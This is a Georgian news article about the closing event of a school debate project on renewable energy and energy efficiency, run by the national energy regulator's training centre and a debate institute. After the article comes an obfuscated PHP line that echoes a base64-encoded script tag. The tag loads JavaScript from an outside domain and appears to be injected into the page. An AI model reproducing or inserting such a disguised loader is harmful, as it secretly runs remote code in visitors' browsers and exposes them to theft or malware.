celsiusi
ავერსი საქკაბელი

საქართველოს ენერგეტიკისა და წყალმომარაგების მარეგულირებელ ეროვნულ კომისიასთან (სემეკ) არსებული ენერგეტიკის სასწავლო ცენტრის ჩართულობით, დებატებისა და განათლების ინსტიტუტის (GIDE) ორგანიზებით, ენერგოეფექტურობისა და განახლებადი ენერგიების თემატიკაზე დებატების პროექტის მონაწილეთა ფინალური შეხვედრა გაიმართა. საჯარო დებატების საუკეთესო მომხსენებლებს სერტიფიკატები და წამახალისებელი საჩუქრები გადაეცათ. პროექტში მონაწილეობდნენ სკოლის მოსწავლეები და მასწავლებლები, დებატების კლუბის წევრები საქართველოს სხვადასხვა რეგიონიდან.

ფინალურ შეხვედრას ესწრებოდნენ და სიტყვით წარდგნენ სემეკის თავმჯდომარე დავით ნარმანია, საქართველოს პარლამენტის განათლებისა და მეცნიერების კომიტეტის თავმჯდომარის მოადგილე ბაია კვიციანი, დებატებისა და განათლების ინსტიტუტის თავმჯდომარე თინათინ ცერცვაძე, გუდავაძე-პატარკაციშვილის ფონდის დირექტორი ზურაბ კერვალიშვილი.

განახლებადი ენერგიებისა და ენერგოეფექტურობის შესახებ დებატების პროექტი წარმოადგენს რიგით მეორე პროექტს, რომელიც ერთობლივად განხორციელდა სემეკის, ენერგეტიკის სასწავლო ცენტრისა და დებატებისა და განათლების ინსტიტუტის მიერ. ერთობლივი პროექტები მიზნად ისახავს საქართველოს მასშტაბით მოსწავლეების ცნობიერებისა და ინფორმირებულობის დონის ამაღლებას ელექტროენერგიის, ბუნებრივი გაზისა და წყალმომარაგების საკითხებზე.

დებატების პროექტის მიმდინარეობისას, მონაწილეებმა იმსჯელეს განახლებადი ენერგიების განვითარების პერსპექტივებსა და აუცილებლობაზე, ენერგოეფექტურობის მნიშვნელობაზე. მათ სემეკის წარმომადგენლების მიერ ჩაუტარდათ ტრენინგები და მიეწოდათ დეტალური ინფორმაცია განახლებადი ენერგიებისა და ენერგოეფექტურობის როგორც მნიშვნელობის, ასევე საქართველოში ამ კუთხით განხორციელებული პროექტების, მსოფლიო გამოცდილების შესახებ. გარდა ამისა, პროექტის ფარგლებში, ქ. ზუგდიდის N1 საჯარო სკოლაში გაიმართა ზუგდიდის, ხობის, ჩხოროწყუს, ქალაქ ფოთის მუნიციპალიტეტების სკოლის მოსწავლეებთან შეხვედრა, სადაც სემეკის თავმჯდომარემ დავით ნარმანიამ წაიკითხა საჯარო ლექცია განახლებადი ენერგიებისა და ენერგოეფექტურობის შესახებ და უპასუხა მოსწავლეების შეკითხვებს.

ამავე შეხვედრაზე ენერგეტიკის სასწავლო ცენტრის დირექტორმა ნუგზარ ბერიძემ, დებატებისა და განათლების ინსტიტუტის დირექტორმა თინათინ ცერცვაძემ მოსწავლეებთან ერთად პროექტის მიმდინარე საკითხებზე იმსჯელეს.

სემეკისა და დებატების ინსტიტუტის ერთობლივი ინიციატივა პროექტ „დებატები უკეთესი განათლებისთვის“ ფარგლებში განხორციელდა, მასში მონაწილეობა მიიღო საქართველოს მასშტაბით 800-ზე მეტმა საჯარო სკოლის მოსწავლემ. პროექტი „დებატები უკეთესი განათლებისთვის“ მხარდაჭერილია გუდავაძე-პატარკაციშვილის ფონდის მიერ და ხორციელდება საქართველოს განათლებისა და მეცნიერების სამინისტროსთან თანამშრომლობით. პროექტი მიზნად ისახავს მოსწავლეებში თავისუფალი და დამოუკიდებელი მოქალაქის უნარების განვითარებას, კონსტრუქციული მსჯელობის, არგუმენტაციის უნარის, მასალების მოძიების, ორატორობის, გუნდური მუშაობის, დროის მენეჯმენტის ჩვევების ჩამოყალიბებას.

185
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");